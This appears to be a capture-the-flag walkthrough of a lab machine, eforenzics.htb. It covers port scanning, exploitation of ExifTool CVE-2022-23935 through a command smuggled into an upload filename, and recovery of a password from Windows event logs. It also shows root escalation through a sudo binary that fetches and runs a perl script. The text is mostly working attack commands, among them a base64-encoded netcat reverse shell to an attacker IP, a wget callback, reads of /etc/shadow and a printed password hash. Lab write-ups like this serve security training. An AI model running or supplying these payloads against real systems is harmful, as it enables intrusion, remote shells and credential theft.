Scanning
> TARGET=10.129.10.189 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Domain:
eforenzics.htb - dirsearch
> dirsearch -u http://eforenzics.htb/
[16:13:10] 301 - 317B - /assets -> http://eforenzics.htb/assets/
[16:13:10] 403 - 279B - /assets/
[16:13:42] 200 - 11KB - /index.html
[16:14:29] 200 - 4KB - /upload.php
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://eforenzics.htb/" -H "Host: FUZZ.eforenzics.htb"
[x]
ExifTool Version Number : 12.37
File Name : test.png
Directory : .
File Size : 627 bytes
File Modification Date/Time : 2023:01:22 21:22:43+00:00
File Access Date/Time : 2023:01:22 21:22:43+00:00
File Inode Change Date/Time : 2023:01:22 21:22:43+00:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 297
Image Height : 167
Bit Depth : 8
Color Type : RGB
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Significant Bits : 8 8 8
Comment :
Image Size : 297x167
Megapixels : 0.050
- Search online for this version found exploit: CVE-2022-23935
# upload image with name: <cmd>|
Content-Disposition: form-data; name="image"; filename="wget <attacker-ip>|"
Content-Type: image/png
# kali
> nc -vnlp 80
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.129.10.189.
Ncat: Connection from 10.129.10.189:55702.
GET / HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: <attacker-ip>
Connection: Keep-Alive
- To get shell, base64 encode your cmd payload and pipe it to the shell
# eg: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc <attacker-ip> 4444 >/tmp/f
Content-Disposition: form-data; name="image"; filename="echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTAuMTAuMTYuNzAgNDQ0NCA+L3RtcC9m | base64 -d | sh |"
User: smorton
*/5 * * * * date >> /usr/local/investigation/analysed_log && echo "Clearing folders" >> /usr/local/investigation/analysed_log && rm -r /var/www/uploads/* && rm /var/www/html/analysed_images/*
- Found
Windows Event Logs for Analysis.msg
www-data@investigation:/usr/local/investigation$ ls -la
total 1288
drwxr-xr-x 2 root root 4096 Sep 30 23:43 .
drwxr-xr-x 11 root root 4096 Aug 27 21:54 ..
-rw-rw-r-- 1 smorton smorton 1308160 Oct 1 00:35 Windows Event Logs for Analysis.msg
-rw-rw-r-- 1 www-data www-data 0 Oct 1 00:40 analysed_log
Windows Event Logs for Analysis.msg can be treated as a zip file, when unzipped, it extract a number of folders and files. Once of them is a zip file of a security.evtx file.
Investigation/log/__attach_version1.0_#00000000/__substg1.0_37010102
# change ext to .zip and unzip to get the security.evtx file
- Investigate the security.evtx in Windows EventViewer and filter by audit failures. You’ll see a failed credential validate event with a password. This is the credential for smorton
The computer attempted to validate the credentials for an account.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account: Def@ultf0r3nz!csPa$$
Source Workstation: EFORENZICS-DI
Error Code: 0xC0000064
- Login via ssh to get the user flag
Root
smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binary
- Reverse the binary using
ghidra
// main.c
undefined8 main(int param_1,long param_2)
{
__uid_t _Var1;
int iVar2;
FILE *__stream;
undefined8 uVar3;
char *__s;
char *__s_00;
if (param_1 != 3) {
puts("Exiting... ");
/* WARNING: Subroutine does not return */
exit(0);
}
_Var1 = getuid();
if (_Var1 != 0) {
puts("Exiting... ");
/* WARNING: Subroutine does not return */
exit(0);
}
iVar2 = strcmp(*(char **)(param_2 + 0x10),"lDnxUysaQn");
if (iVar2 != 0) {
puts("Exiting... ");
/* WARNING: Subroutine does not return */
exit(0);
}
puts("Running... ");
__stream = fopen(*(char **)(param_2 + 0x10),"wb");
uVar3 = curl_easy_init();
curl_easy_setopt(uVar3,0x2712,*(undefined8 *)(param_2 + 8));
curl_easy_setopt(uVar3,0x2711,__stream);
curl_easy_setopt(uVar3,0x2d,1);
iVar2 = curl_easy_perform(uVar3);
if (iVar2 == 0) {
iVar2 = snprintf((char *)0x0,0,"%s",*(undefined8 *)(param_2 + 0x10));
__s = (char *)malloc((long)iVar2 + 1);
snprintf(__s,(long)iVar2 + 1,"%s",*(undefined8 *)(param_2 + 0x10));
iVar2 = snprintf((char *)0x0,0,"perl ./%s",__s);
__s_00 = (char *)malloc((long)iVar2 + 1);
snprintf(__s_00,(long)iVar2 + 1,"perl ./%s",__s);
fclose(__stream);
curl_easy_cleanup(uVar3);
setuid(0);
system(__s_00);
system("rm -f ./lDnxUysaQn");
return 0;
}
puts("Exiting... ");
/* WARNING: Subroutine does not return */
exit(0);
}
- This program accepts two args as input: arg1 is used as a param to set the
curl_easy_setopt function’s option 0x2712 (i.e 10002, CURLOPT_URL, https://curl.se/mail/archive-2004-07/0100.html). arg2 is a pass string: lDnxUysaQn, and also used as a temporary file name. - We can set the CURLOPT_URL parameter to read a local file, e.g: file:///root/root.txt
# session 1, constantly read the lDnxUysaQn file and dump info into tmp
> while true; do cat lDnxUysaQn >> tmp; done
# session 2, keep running the process for session 1 to capture the flag
> sudo /usr/bin/binary file:///root/root.txt lDnxUysaQn
- Using this way, we can read
/root/root.txt and /etc/shadow
# shadow
root:$6$8KeEz2EYMU05RVyS$W5GGqM4AHw3D1tLul.LJN2BPUhqEdflA.yCQyu7/c2PtZmbAn6qevqSaUlFyhPQbgbhFmDB00I3Of7qPep2WP/:19233:0:99999:7:::
# serve a root.pl file on kali
exec "/bin/bash";
# call the script
> sudo /usr/bin/binary http://<attacker-ip>/root.pl lDnxUysaQn
